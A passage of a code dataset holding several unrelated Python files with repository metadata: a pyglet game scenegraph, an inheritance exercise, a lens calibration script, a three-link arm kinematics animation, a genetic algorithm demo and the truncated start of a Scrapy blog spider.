= False\n self.default, self.animations = self.load(os.path.join('assets', 'animations', fname))\n self.playing = self.default\n super(Animation, self).__init__(pos, self.get_animation('default'), z=z)\n self.sprite.set_handler('on_animation_end', self.on_animation_end)\n\n def set_scenegraph(self, sg):\n if sg is None:\n self.sprite.pop_handlers()\n self.sprite.remove_handler('on_animation_end', self.on_animation_end)\n super(Animation, self).set_scenegraph(sg)\n\n def on_animation_end(self, *args):\n if self.sprite.image.frames[-1].duration == 0:\n self.play('default')\n\n def set_flip(self, flip):\n if flip == self.flip_x:\n return\n self.play(self.playing, flip)\n\n def load(self, fname):\n try:\n return self.loaded[fname]\n except KeyError:\n pass\n\n from pyglet.image import Animation, AnimationFrame\n\n self.doc = json.load(resource_stream('wildwest', fname))\n\n animations = {}\n default = None\n for name, a in list(self.doc.items()):\n if name == 'default':\n if isinstance(a, str):\n default = a\n continue\n else:\n default = 'default'\n frames = []\n for f in a['frames']:\n im = pyglet.resource.image(f['file'])\n im.anchor_x, im.anchor_y = a.get('anchor', (0, 0))\n frames.append(\n [im, a.get('frametime', 0.1)]\n )\n\n if not 
a.get('loop', False):\n if len(frames) == 1:\n frames.append(frames[0])\n frames[-1][1] = 0\n\n animations[name] = Animation([AnimationFrame(*f) for f in frames])\n self.loaded[fname] = default, animations\n return default, animations\n\n def get_animation(self, name):\n if name == 'default':\n return self.animations[self.default]\n return self.animations[name]\n\n def play(self, name, flip=None):\n if name == 'default':\n name = self.default\n\n if name == self.playing and (flip is None or flip == self.flip_x):\n return\n if flip is not None:\n self.flip_x = flip\n anim = self.get_animation(name)\n if self.flip_x:\n anim = anim.get_transform(flip_x=True)\n self.playing = name\n self.sprite.image = anim\n\n\nclass AnimatedEffect(Animation):\n def on_animation_end(self, *args):\n self.scenegraph.remove(self)\n\n\nclass Depth(Node):\n def __init__(self, node, dz, pos=v(0, 0)):\n self.node = node\n self.dz = dz\n self.pos = v(pos)\n\n def get_position(self):\n return self._pos\n\n def set_position(self, pos):\n self._pos = pos\n self.node.pos = pos\n\n pos = property(get_position, set_position)\n\n @property\n def z(self):\n return self.node.z + self.dz\n\n def draw(self, camera):\n gl.glPushMatrix()\n gl.glTranslatef(self.pos.x, self.pos.y, self.dz)\n self.node.draw(camera)\n gl.glPopMatrix()\n\n\nclass GroundPlane(Node):\n z = -9999\n\n def __init__(self, near_colour, far_colour, y=0):\n self.near_colour = list(near_colour)\n self.far_colour = list(far_colour)\n self.y = y\n\n def draw(self, camera):\n far = camera.far_plane()\n near = camera.near_plane()\n focus = camera.focus\n coords = ('v3f', [\n near.l, self.y, focus - camera.near,\n near.r, self.y, focus - camera.near,\n far.r, self.y, focus - camera.far,\n far.l, self.y, focus - camera.far,\n ])\n col = ('c4B', self.near_colour * 2 + self.far_colour * 2)\n pyglet.graphics.draw(4, gl.GL_QUADS, coords, col)\n\n\nclass SkyBox(Node):\n z = -10000\n\n def __init__(self, horizon_colour, zenith_colour):\n self.horizon_colour = list(horizon_colour)\n self.zenith_colour = list(zenith_colour)\n\n def draw(self, camera):\n far = camera.far_plane()\n z = -camera.far + camera.focus\n coords = ('v3f', [\n far.l, 0, z,\n far.r, 0, z,\n far.r, far.t, z,\n far.l, far.t, z,\n ])\n col = ('c4B', self.horizon_colour * 2 + self.zenith_colour * 2)\n pyglet.graphics.draw(4, gl.GL_QUADS, coords, col)\n\n\nclass RectNode(Node):\n def __init__(self, rect, colour, z=0):\n self.rect = rect\n self.colour = colour\n self.z = z\n\n def draw(self, camera):\n gl.glColor4f(*self.colour)\n r = self.rect\n z = self.z\n coords = ('v3f', [\n r.l, r.b, z,\n r.r, r.b, z,\n r.r, r.t, z,\n r.l, r.t, z,\n ])\n pyglet.graphics.draw(4, gl.GL_QUADS, coords)\n gl.glColor4f(1, 1, 1, 1)\n\n\nclass Bullet(Node):\n z = 0.1\n trail_width = 2\n\n batch = pyglet.graphics.Batch()\n MAX_AGE = 0.6\n MAX_LENGTH = 500\n\n def __init__(self, segment):\n self.seg = segment\n self.t = None\n self.build()\n\n def build(self, age=0):\n p1, p2 = self.seg.points\n across = self.seg.axis * 0.5 * self.trail_width\n\n length = self.seg.length / self.MAX_LENGTH\n frac = (age / self.MAX_AGE)\n frac2 = frac * frac\n c1 = (1, 1, 1, max(0, 0.1 - frac2))\n c2 = (1, 1, 1, min(1, length * self.MAX_AGE - frac2))\n\n bl = p1 - across\n br = p2 - across\n tr = p2 + across\n tl = p1 + across\n\n self.vl = pyglet.graphics.vertex_list(4,\n ('v2f', list(chain(bl, br, tr, tl))),\n ('c4f', list(chain(c1, c2, c2, c1))),\n )\n\n def update(self, age):\n self.vl.delete()\n self.build(age)\n\n def draw(self, camera):\n if 
self.t is None:\n self.t = self.scenegraph.t\n else:\n age = self.scenegraph.t - self.t\n if age > self.MAX_AGE:\n self.scenegraph.remove(self)\n return\n else:\n self.update(age)\n gl.glEnable(gl.GL_BLEND)\n gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)\n self.vl.draw(gl.GL_QUADS)\n\n\nclass DebugGeometryNode(CompoundNode):\n z = 10\n def __init__(self, physics, colour=(1, 0, 1, 0.5)):\n self.physics = physics\n children = []\n for r in physics.static_geometry:\n children.append(RectNode(r, colour))\n super(DebugGeometryNode, self).__init__(children=children)\n\n def draw(self, camera):\n gl.glEnable(gl.GL_BLEND)\n gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)\n super(DebugGeometryNode, self).draw(camera)\n for d in self.physics.dynamic:\n RectNode(d.get_rect(), (0, 1, 0, 0.5)).draw(camera)\n\n\nclass Fill(Node):\n z = -1000\n\n def __init__(self, colour):\n self.colour = colour\n\n def draw(self, camera):\n gl.glClearColor(*self.colour)\n gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)\n\n\nclass Scenegraph(object):\n def __init__(self):\n self.objects = set()\n self.t = 0\n\n def update(self, dt):\n self.t += dt\n\n def add(self, obj):\n obj.set_scenegraph(self)\n self.objects.add(obj)\n\n def remove(self, obj):\n obj.set_scenegraph(None)\n self.objects.remove(obj)\n\n def draw(self, camera):\n camera.setup_matrixes()\n obs = list(self.objects)\n obs.sort(key=lambda x: x.z)\n gl.glDisable(gl.GL_DEPTH_TEST)\n for o in obs:\n o.draw(camera)\n\n def on_key_press(self, symbol, modifier):\n for o in self.objects:\n if hasattr(o, 'on_key_press'):\n o.on_key_press(symbol, modifier)\n\n\nif __name__ == '__main__':\n WIDTH = 800\n HEIGHT = 600\n w = pyglet.window.Window(width=800, height=600)\n s = Scenegraph()\n# s.add(Fill((1.0, 1.0, 1.0, 1.0)))\n# s.add(Wheels((91, 0)))\n# s.add(Wheels((992 - 236, 0)))\n# s.add(StaticImage((0, 53), 'car-interior.png'))\n# s.add(StaticImage((90, 115), 'pc-standing.png'))\n# s.add(StaticImage((600, 115), 'lawman-standing.png'))\n# s.add(StaticImage((300, 115), 'table.png'))\n# s.add(StaticImage((500, 115), 'crate.png'))\n s.add(RailTrack(pyglet.resource.texture('track.png')))\n ground = GroundPlane(\n (218, 176, 127, 255),\n (194, 183, 164, 255),\n )\n s.add(ground)\n\n s.add(SkyBox(\n (129, 218, 255, 255),\n (49, 92, 142, 255)\n ))\n\n s.add(Locomotive(pos=(0, 0)))\n camera = Camera((200.0, 200.0), WIDTH, HEIGHT)\n\n @w.event\n def on_draw():\n s.draw(camera)\n\n def update(dt):\n camera.offset += v(100, 0) * dt\n s.update(dt)\n\n pyglet.clock.schedule_interval(update, 1/60.0)\n pyglet.app.run()\n","repo_name":"lordmauve/last-train-to-nowhere","sub_path":"wildwest/scenegraph/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14054097091","text":"class product():\n def __init__(self,colour,price):\n print(\"This is parent class\")\n self.colour=colour\n self.price=price\n\n\nclass Mobile(product):\n def __init__(self,brand):\n print(\"this is child class\")\n self.brand=brand\n # print(\"first object : \",m.self.colour,\"price : \",m.price)\n print(\"Second object : \",b.colour,\"price : \",b.price)\n\n\np=product(\"Black\",2000)\nb=product(\"blue\",3000)\nm=Mobile(\"LG\")\n \n 
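# Note: Mobile.__init__ above never chains to product.__init__, so a Mobile\n# instance gets no colour/price of its own and the print reads the global 'b'.\n# A minimal sketch of the conventional pattern (hypothetical, not the code above):\n#\n#   class Mobile(product):\n#       def __init__(self, colour, price, brand):\n#           super().__init__(colour, price)\n#           self.brand = brand\n#\n#   m = Mobile(\"Black\", 2000, \"LG\")\n#   print(\"brand:\", m.brand, \"colour:\", m.colour, \"price:\", m.price)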
\n","repo_name":"anilsharma328/My-dev-work","sub_path":"Inheritance_example.py","file_name":"Inheritance_example.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23729838786","text":"import os, sys\nimport numpy as np\nfrom universal_lens_cal import LensCalibrator\n\n# project_path = 'D:/lens_cal/221222_FAT_completed/FAT3/'\n# project_path = 'D:/221220_75mm/'\n# project_path = 'D:/lens_cal/230125_after_AA/'\n# project_path = 'D:/lens_cal/230127_using_only_5_images_that_has_been_taken_after_AA/'\n# project_path = 'D:/lens_cal/230130/'\n# project_path = 'D:/lens_cal/230208_module_02/'\n# project_path = 'D:/lens_cal/230208_module_04/'\n# project_path = 'D:/lens_cal/230208_module_05/'\n# project_path = 'D:/lens_cal/230208_module_06/'\n# project_path = 'D:/lens_cal/230224_fov_test_module_04/'\n# project_path = 'D:/lens_cal/230302_fov_alpha_test_module_05/'\n# project_path = 'D:/lens_cal/230302_distortion_parameterizing/'\n# project_path = 'D:/lens_cal/230719_gen1.5_module01/'\n# project_path = 'D:/lens_cal/230719_gen1.5_module02/'\n# project_path = 'D:/lens_cal/230719_gen1.5_module05/'\nproject_path = 'D:/lens_cal/230811_gen1.5_module08/'\n\nraw_dir = project_path + 'raw/' # Designate the directory in which raw data files are stored.\nraw_pca_dir = project_path + 'raw_pca/' # PCA analysis results are saved here.\nraw_det_dir = project_path + 'raw_det/' # The blob detection result of raw data is saved here.\nraw_und_dir = project_path + 'raw_und/' # The undistorted result of raw data is saved here.\nraw_par_dir = project_path + 'raw_par/' # Camera and distortion parameters are saved here.\nraw_fov_dir = project_path + 'raw_fov/' # The undistorted results with various alpha are saved here.\nraw_und_det_dir = project_path + 'raw_und_det/' # The blob detection result of the undistorted images is saved here.\nraw_cur_dir = project_path + 'raw_cur/' # The curvature calculation result is saved here.\n\n# The same kind of directories for the flipped raw data.\nflip_dir = project_path + 'flip/'\nflip_pca_dir = project_path + 'flip_pca/'\nflip_det_ups_dir = project_path + 'flip_ups_det/'\nflip_ups_dir = project_path + 'flip_ups/'\nflip_und_ups_dir = project_path + 'flip_ups_und/'\nflip_und_dir = project_path + 'flip_und/'\n\n# The same kind of directories for the upscaled raw data. 
\nups_dir = project_path + 'ups/'\nups_pca_dir = project_path + 'ups_pca/'\nups_det_dir = project_path + 'ups_det/'\nups_und_dir = project_path + 'ups_und/'\nups_par_dir = project_path + 'ups_par/'\nups_fov_dir = project_path + 'ups_fov/'\nups_und_det_dir = project_path + 'ups_und_det/'\nups_und_pca_dir = project_path + 'ups_und_pca/'\n\n# Make the output directories (exist_ok avoids errors when they already exist).\nos.makedirs(raw_pca_dir, exist_ok=True)\nos.makedirs(raw_det_dir, exist_ok=True)\nos.makedirs(raw_und_dir, exist_ok=True)\nos.makedirs(raw_par_dir, exist_ok=True)\nos.makedirs(raw_fov_dir, exist_ok=True)\nos.makedirs(raw_und_det_dir, exist_ok=True)\nos.makedirs(raw_cur_dir, exist_ok=True)\n\nos.makedirs(ups_dir, exist_ok=True)\nos.makedirs(ups_pca_dir, exist_ok=True)\nos.makedirs(ups_det_dir, exist_ok=True)\nos.makedirs(ups_und_dir, exist_ok=True)\nos.makedirs(ups_par_dir, exist_ok=True)\nos.makedirs(ups_fov_dir, exist_ok=True)\nos.makedirs(ups_und_det_dir, exist_ok=True)\nos.makedirs(ups_und_pca_dir, exist_ok=True)\n\n# Defining the dimensions of checkerboard.\nh = 5 # height.\nw = 20 # width.\nCHECKERBOARD = (h, w)\n\nhg, vg = 5, 5 # The horizontal gap and vertical gap between the blobs, in cm units.\nshoot = LensCalibrator('.png', 'Ambient')\n\n# Flip the raw image data.\n# flip_dir = shoot.flip()\n# Execute the blob detection on the raw images.\nMwps, Mips_raw, fnames_found, raw_size = \\\n    shoot.simpleblob_detection(raw_dir, raw_pca_dir, CHECKERBOARD, 5, 5, minArea=0, upscale=False, savedir=raw_det_dir)\n\n# Execute the blob detection on the upscaled images.\nMwps, Mips_ups, Mips_raw, fnames_found, ups_size, raw_size = \\\n    shoot.simpleblob_detection(raw_dir, ups_pca_dir, CHECKERBOARD, 5, 5, savedir=ups_det_dir, ups_dir=ups_dir, upscale=True, sf=4)\n\n#ret, cv2_intr, cv2_dist, cv2_rvecs, cv2_tvecs = cv2.calibrateCamera(Mwps, Mips, CHECKERBOARD, None, None, flags=cv2.CALIB_RATIONAL_MODEL)\nfx_ups = ups_size[0] / np.sqrt(3)\nfy_ups = fx_ups # This should be the same as fx, because the lens is isotropic even though the sensor is not.\ncx_ups = ups_size[0] / 2 - 1\ncy_ups = ups_size[1] / 2 - 1\n\nfx_raw = raw_size[0] / np.sqrt(3)\nfy_raw = fx_raw\ncx_raw = raw_size[0] / 2 - 1\ncy_raw = raw_size[1] / 2 - 1\n\ninit_ups = np.array([[fx_ups, 0, cx_ups], [0, fy_ups, cy_ups], [0, 0, 1]])\ninit_raw = np.array([[fx_raw, 0, cx_raw], [0, fy_raw, cy_raw], [0, 0, 1]])\n# init_raw = np.array([[10, 0, 10], [0, 10, 10], [0, 0, 1]])\n\nret, intr_ups, dist_ups, rvecs_ups, tvecs_ups = shoot.calibrate(Mwps, Mips_ups, ups_size, init_ups, ups_par_dir)\nret, intr_raw, dist_raw, rvecs_raw, tvecs_raw = shoot.calibrate(Mwps, Mips_raw, raw_size, init_raw, raw_par_dir)\n\n# Undistort the images using initial guess.\nfor alpha in [0, 0.5, 0.6]:\n    newcm_ups, roi_ups = shoot.get_undistorted_images(ups_dir, ups_und_dir, intr_ups, dist_ups, alpha=alpha)\n    newcm_raw, roi_raw = shoot.get_undistorted_images(raw_dir, raw_und_dir, intr_raw, dist_raw, alpha=alpha)\n\n    np.save(raw_par_dir+f'newcm_alpha_{alpha}', newcm_raw)\n    np.save(ups_par_dir+f'newcm_alpha_{alpha}', newcm_ups)\n\n    np.savetxt(raw_par_dir+f'newcm_alpha_{alpha}.txt', newcm_raw, fmt='%.2e')\n    
np.savetxt(ups_par_dir+f'newcm_alpha_{alpha}.txt', newcm_ups, fmt='%.2e')\n\n    print(f\"The intrinsic parameters of the raw images when alpha = {alpha}: {newcm_raw}\")\n    print(f\"The distortion parameters of the raw images: {dist_raw}\")\n\n# sys.exit()\n\n\"\"\"\n# Find curvature of the uppermost line.\nintr_raw = np.load(raw_par_dir+'intrinsic_alpha_0.npy') # Load the intrinsic parameters.\ndist_raw = np.load(raw_par_dir+'distortion.npy') # Load the distortion parameters.\n_, Mips_und_ups, _, _ = shoot.simpleblob_detection(ups_und_dir, ups_und_pca_dir, CHECKERBOARD, 5, 5, savedir=ups_und_det_dir, upscale=False, minArea=0)\n\nresolution = (192,56)\nMwps, Mips_ups, fnames_dis = shoot.load_wps_ips(ups_det_dir, CHECKERBOARD, hg, vg)\n_, Mips_ups_und, fnames_und = shoot.load_wps_ips(ups_und_det_dir, CHECKERBOARD, hg, vg)\ncur_dis, cur_und, Mips_und = shoot.get_max_curvature(Mips_ups, Mips_ups_und, fnames_dis, CHECKERBOARD, 4, resolution, raw_cur_dir)\n\n# FOV comparison.\nresolution = (192,56)\nintr_raw = np.load(raw_par_dir+'intrinsic_alpha_0.npy')\ndist_raw = np.load(raw_par_dir+'distortion.npy')\ndst, udst = shoot.fov_comparison(resolution, 1, intr_raw, dist_raw, raw_fov_dir)\n\nshoot.get_undistorted_images(raw_dir, raw_und_dir, intr_raw, dist_raw, sf=1, alpha=0.0)\nMwps, Mips_ups, Mips_raw, fnames_found, ups_size, raw_size = \\\n    shoot.simpleblob_detection(raw_dir, ups_pca_dir, CHECKERBOARD, 5, 5, savedir=ups_det_dir, ups_dir=ups_dir, upscale=True, sf=4)\nnp.savetxt('mips.txt', Mips_raw[0])\nMwps, Mips_und_ups, Mips_und_raw, fnames_found, ups_size, raw_size = \\\n    shoot.simpleblob_detection(raw_und_dir, ups_und_pca_dir, CHECKERBOARD, 5, 5, savedir=ups_und_det_dir, ups_dir=ups_und_dir, upscale=True, sf=4)\nnp.savetxt('mips_und.txt', Mips_und_raw[0])\n\"\"\"\n\nprint(\"finished.\")","repo_name":"steve1029/camera_cal","sub_path":"lidar_geo_cal.py","file_name":"lidar_geo_cal.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8076812183","text":"from __future__ import print_function\n\nimport math\nimport unittest\nfrom functools import reduce\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D  # pylint: disable=W0611\n\nimport matplotlib.patches as mpatches\nimport matplotlib.transforms as mtransforms\nimport mpl_toolkits.mplot3d.axes3d as p3\n\nfrom matplotlib import animation\nfrom IPython.display import HTML\n\nimport gtsam\nimport gtsam.utils.plot as gtsam_plot\nfrom gtsam import Pose2\n\n# Some utility functions for Pose2\ndef vector3(x, y, z):\n\t\"\"\"Create 3D double numpy array.\"\"\"\n\treturn np.array([x, y, z], dtype=float)\n\n\ndef compose(*poses):\n\t\"\"\"Compose all Pose2 transforms given as arguments from left to right.\"\"\"\n\treturn reduce((lambda x, y: x.compose(y)), poses)\n\n\ndef vee(M):\n\t\"\"\"Pose2 vee operator.\"\"\"\n\treturn vector3(M[0, 2], M[1, 2], M[1, 0])\n\n\ndef delta(g0, g1):\n\t\"\"\"Difference between x, y, theta components of SE(2) poses.\"\"\"\n\treturn vector3(g1.x() - g0.x(), g1.y() - g0.y(), g1.theta() - g0.theta())\n\n\ndef trajectory(g0, g1, N=20):\n\t\"\"\" Create an interpolated trajectory in SE(2), treating x,y, and theta separately.\n\t\tg0 and g1 are the initial and final pose, respectively.\n\t\tN is the number of *intervals*\n\t\tReturns N+1 poses\n\t\"\"\"\n\te = delta(g0, g1)\n\treturn [Pose2(g0.x()+e[0]*t, g0.y()+e[1]*t, g0.theta()+e[2]*t) for t in np.linspace(0, 1, N + 1)]\n\n# The 3-link 
manipulator class\n\nclass ThreeLinkArm(object):\n\t\"\"\"Three-link arm class.\"\"\"\n\n\tdef __init__(self):\n\t\tself.L1 = 3.5\n\t\tself.L2 = 3.5\n\t\tself.L3 = 2.5\n\n\tdef fk(self, q):\n\t\t\"\"\" Forward kinematics.\n\t\t\tTakes numpy array of joint angles, in radians.\n\t\t\"\"\"\n\n\t\tT_0 = Pose2(0, 0, math.radians(90) + q[0])\n\t\tT1 = Pose2(self.L1, 0, q[1])\n\t\tT2 = Pose2(self.L2, 0, q[2])\n\t\tT3 = Pose2(self.L3, 0, 0)\n\t\tout = compose(T_0, T1, T2, T3)\n\n\t\treturn out\n\n\tdef jacobian(self, q):\n\t\t\"\"\" Calculate manipulator Jacobian.\n\t\t\tTakes numpy array of joint angles, in radians.\n\t\t\"\"\"\n\n\t\ttheta1 = q[0]\n\t\ttheta2 = q[1]\n\t\ttheta3 = q[2]\n\n\t\talpha = theta1 + theta2\n\t\tbeta = theta1 + theta2 + theta3\n\n\t\tJ = [[-self.L1 * math.cos(theta1) - self.L2 * math.cos(alpha) - self.L3 * math.cos(beta),\n\t\t\t -self.L2 * math.cos(alpha) - self.L3 * math.cos(beta), - self.L3 * math.cos(beta)],\n\t\t\t [-self.L1 * math.sin(theta1) - self.L2 * math.sin(alpha) - self.L3 * math.sin(beta),\n\t\t\t - self.L2 * math.sin(alpha) - self.L3 * math.sin(beta), - self.L3 * math.sin(beta)],\n\t\t\t [1, 1, 1]]\n\n\t\tJ = np.array(J)\n\n\t\treturn J\n\ndef main():\n\t# First set up the figure, the axis, and the plot element we want to animate\n\tfig, ax = plt.subplots()\n\tplt.close()\n\tN=50\n\tsize=10.5\n\tax.set_xlim((-size, size))\n\tax.set_ylim((-size, size))\n\tomega = 2*math.pi/N\n\n\tarm = ThreeLinkArm()\n\tq = np.radians(vector3(30, -30, 45))\n\tsTt_initial = arm.fk(q)\n\tsTt_goal = Pose2(2.4, 4.3, math.radians(0))\n\tposes = trajectory(sTt_initial, sTt_goal, N)\n\n\tdef init():\n\t\trect = mpatches.Rectangle([0,0], 1, 1, angle =0)\n\t\treturn (rect,)\n\n\t# animation function. This is called sequentially\n\tdef animate(i):\n\t\t# q lives in main()'s scope and is rebound below, so it must be declared nonlocal\n\t\tnonlocal q\n\n\t\t# Computes the forward kinematics to get the pose of the end-effector for the given angular position of the joints (q)\n\t\tsTt = arm.fk(q)\n\t\t# Evaluate the error between the current position of the end-effector and the desired position at moment i\n\t\terror = delta(sTt, poses[i])\n\t\t# Get the jacobian of the arm at the given pose\n\t\tJ = arm.jacobian(q)\n\t\t# Move the arm joints in the respective direction\n\t\tq += np.dot(np.linalg.inv(J), error)\n\n\t\t# ------------------------- ANIMATION ----------------------------------------------------\n\t\trect = mpatches.Rectangle([-0.5,-0.5], 1, 1, angle =0)\n\t\tax.clear()\n\t\tax.set_xlim((-size, size))\n\t\tax.set_ylim((-size, size))\n\t\tax.add_artist(rect)\n\n\t\tsXl1 = Pose2(0, 0, math.radians(90))\n\t\tl1Zl1 = Pose2(0, 0, q[0])\n\t\tl1Xl2 = Pose2(arm.L1, 0, 0)\n\t\tsTl2 = compose(sXl1, l1Zl1, l1Xl2)\n\t\tt1 = sTl2.translation()\n\t\tax.add_artist(mpatches.Rectangle([0,0], 3.5, 0.1, angle =q[0]*180/np.pi+90, color='r'))\n\n\t\tl2Zl2 = Pose2(0, 0, q[1])\n\t\tl2Xl3 = Pose2(arm.L2, 0, 0)\n\t\tsTl3 = compose(sTl2, l2Zl2, l2Xl3)\n\t\tt2 = sTl3.translation()\n\t\tax.add_artist(mpatches.Rectangle([t1.x(),t1.y()], 3.5, 0.1, angle =(q[0]+q[1])*180/np.pi+90, color='g'))\n\n\t\tl3Zl3 = Pose2(0, 0, q[2])\n\t\tl3Xt = Pose2(arm.L3, 0, 0)\n\t\tsTt = compose(sTl3, l3Zl3, l3Xt)\n\t\tt3 = sTt.translation()\n\t\tax.add_artist(mpatches.Rectangle([t2.x(),t2.y()], 2.5, 0.1, angle =(q[0]+q[1]+q[2])*180/np.pi+90, color='b'))\n\n\t# keep a reference to the animation so it is not garbage collected\n\tanim = animation.FuncAnimation(fig, animate, init_func=init, \n\t\t\t\t\t\t\tframes=N, interval=100, blit=False)\n\n\nif __name__ == 
'__main__':\n\tmain()\n\n\n\n\n","repo_name":"sanmesh1/MobileManipulationFinalProject","sub_path":"kinematics_course.py","file_name":"kinematics_course.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41360093406","text":"#------------------------------------------------------------#\n# #\n# genetic_algorithm.py #\n# #\n# genetic_algorithm.py performs evolutionary optimzation us- #\n# ing genetic algorithm. It is a research code that uses var-#\n# ious selection, crossover, and mutation methods to find #\n# the minimum of a given objective. #\n# #\n# Input(s): #\n# #\n# Output(s): #\n# Minimum value #\n# #\n# Author : Jack Rossetti #\n# Date : 21-10-04 #\n# Contact : jsrossetti23@gmail.com #\n# #\n#------------------------------------------------------------#\nimport random\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nprint(\"\");\nprint(\"****************************************************************\");\nprint(\"* *\");\nprint(\"* genetic_algorithm.py *\");\nprint(\"* *\");\nprint(\"* genetic_algorithm.py performs evolutionary optimzation using *\");\nprint(\"* a genetic algorithm. It is a research code that uses various *\");\nprint(\"* selection, crossover, and mutation methods to find the mini- *\");\nprint(\"* mum of a given objective. *\");\nprint(\"* *\");\nprint(\"* Input(s): *\");\nprint(\"* *\");\nprint(\"* Output(s): *\");\nprint(\"* Minimum value *\");\nprint(\"* *\");\nprint(\"* Author : Jack Rossetti *\");\nprint(\"* Date : 21-10-04 *\");\nprint(\"* Contact : jsrossetti23@gmail.com *\");\nprint(\"* *\");\nprint(\"****************************************************************\");\nprint(\"\");\n\nseed = 19920123;\n#random.seed(seed);\n\ncrossover = 0.85;\nmutation = 0.005;\n\nNsol = 10000;\nxmax = 100.0;\nxmin = -100.0;\nrng = xmax-xmin;\noffset= xmin/rng;\ndx = (xmax-xmin)/(Nsol-1)\nxsol = np.zeros([Nsol,1]);\nfsol = np.zeros([Nsol,1]);\nfor i in range(0, Nsol):\n## begin for i\n xsol[i] = xmin+dx*i;\n fsol[i] = xsol[i]*xsol[i]#+1000*math.sin(15*math.pi*xsol[i]/rng);\n## end for i\n \nNgene = 16;\nMpop = 10;\nBmax = 2.0**(Ngene)-1.0;\nx = np.zeros([Mpop,Ngene])\nxbin = np.zeros([Mpop, 1])\nxind = np.zeros([Mpop, 1])\nfind = np.zeros([Mpop, 1])\nnind = np.zeros([Mpop, 1])\n\n#\n# Initialize population\n#\nfor ipop in range(0,Mpop):\n## begin for ipop\n xsum = 0;\n for igene in range(1,Ngene+1):\n ## begin for igene\n ii = Ngene-igene;\n x[ipop,ii] = random.randint(0,1);\n ## end for igene\n## end for ipop\n\nNiter = 250;\n\nfig = plt.figure();\n \nfor k in range(0,Niter):\n## begin for k\n fsum = 0;\n for ipop in range(0,Mpop):\n ## begin for ipop\n xsum = 0;\n for igene in range(1,Ngene+1):\n ## begin for igene\n ii = Ngene-igene;\n xsum = x[ipop,ii]*2**(igene-1) + xsum;\n ## end for igene\n xval = ((xsum/Bmax)+offset)*rng;\n xbin[ipop] = xsum;\n xind[ipop] = xval;\n find[ipop] = xval*xval#+1000*math.sin(15*math.pi*xval/rng);\n fsum = fsum + find[ipop];\n ## end for ipop\n \n for ipop in range(0,Mpop):\n ## begin for ipop\n nind[ipop] = 1-(find[ipop]/fsum);\n ## end for ipop\n\n if(k > 0):\n plt.clf();\n \n plt.plot(xsol, fsol);\n plt.plot(xind, find, 'ro');\n plt.draw();\n plt.pause(0.001);\n \n sort_find = np.argsort(find, axis=0);\n \n #\n # Determine the mating pool\n #\n xnew = np.zeros([Mpop, Ngene]);\n \n for imate in range(0, int(Mpop/2)):\n ## begin for imate\n \n xparent = np.zeros([ 2,Ngene]);\n \n for iparent in range(0,2):\n ## 
begin for ipop\n            R = random.random();\n            rsum = 0;\n            for jpop in range(0,Mpop):\n            ## begin for jpop\n                rsum = rsum + nind[sort_find[jpop]]\n                if(rsum > R):\n                ## begin if\n                    xparent[iparent,:] = x[sort_find[jpop],:];\n                    break;\n                ## end if\n            ## end for jpop\n        ## end for ipop\n\n        xchild = xparent.copy(); # copy the parents; plain assignment would alias them and corrupt the crossover swap below\n        R = random.random();\n        if(R < crossover):\n        ## begin if\n            cgene = random.randint(1,Ngene-1);\n            for igene in range(cgene+1,Ngene+1):\n            ## begin for igene\n                ii = Ngene-igene\n                xchild[0,ii] = xparent[1,ii];\n                xchild[1,ii] = xparent[0,ii];\n            ## end for igene\n        ## end if\n\n        for ichild in range(0,2):\n        ## begin for ichild\n            for igene in range(1,Ngene+1):\n            ## begin for igene\n                ii= Ngene-igene;\n                R = random.random();\n                if(R < mutation):\n                ## begin if\n                    if(xchild[ichild,ii] > 0):\n                    ## begin if\n                        xchild[ichild,ii] = 0;\n                    elif(xchild[ichild,ii] < 1):\n                        xchild[ichild,ii] = 1;\n                    ## end if\n                ## end if\n            ## end for igene\n        ## end for ichild\n\n        xnew[2*imate  ,:] = xchild[0,:];\n        xnew[2*imate+1,:] = xchild[1,:];\n\n    ## end for imate\n\n    x = xnew;\n    fstar = min(find);\n    print(\"Iteration: %5d, favg = %8.4f, fmin = %10.4e\" % (k, fsum/Mpop, fstar) );\n\n## end for k\n\nplt.show();\n\nexit();\n","repo_name":"jack-s-rossetti/coding_projects","sub_path":"python_scripts/genetic_algorithm.py","file_name":"genetic_algorithm.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71405190546","text":"import scrapy\nfrom elenkov.items import Article\nfrom datetime import datetime\nfrom scrapy.loader import ItemLoader\n\n\nclass ElenSpider(scrapy.Spider):\n    name = 'elen'\n    allowed_domains = ['elenkov.net']\n    start_urls = ['http://elenkov.net/блог-2/']\n\n    def parse(self, response):\n        categories = response.xpath(\"//section[@id='categories-2']/ul/li/a\")\n        for category in categories:\n            category_name = category.xpath(\".//text()\").get()\n            yield response.follow(category, self.parse_category, cb_kwargs=dict(category=category_name))\n\n    def parse_category(self, response, category):\n        articles = response.xpath(\"//div[@class='slide-content']\")\n        for article in articles:\n            date = article.xpath(\".//div[@class='slide-meta']//time/text()\").get() or \"Not available\"\n            link = article.xpath(\".//header/h3/a/@href\").get()\n            yield response.follow(link, self.parse_article, cb_kwargs=dict(category=category, date=date))\n\n        next_page = response.xpath(\"//a[text()='›']/@href\").get()\n        if next_page:\n            yield response.follow(next_page, self.parse_category, cb_kwargs=dict(category=category))\n\n    def parse_article(self, response, category, date):\n        item = ItemLoader(item=Article(), response=response)\n\n        title = response.xpath(\"//h1/a/text()\").get() or \"Not available\"\n        author = response.xpath(\"//a[@rel='author']/text()\").get() or \"Not available\"\n        content = 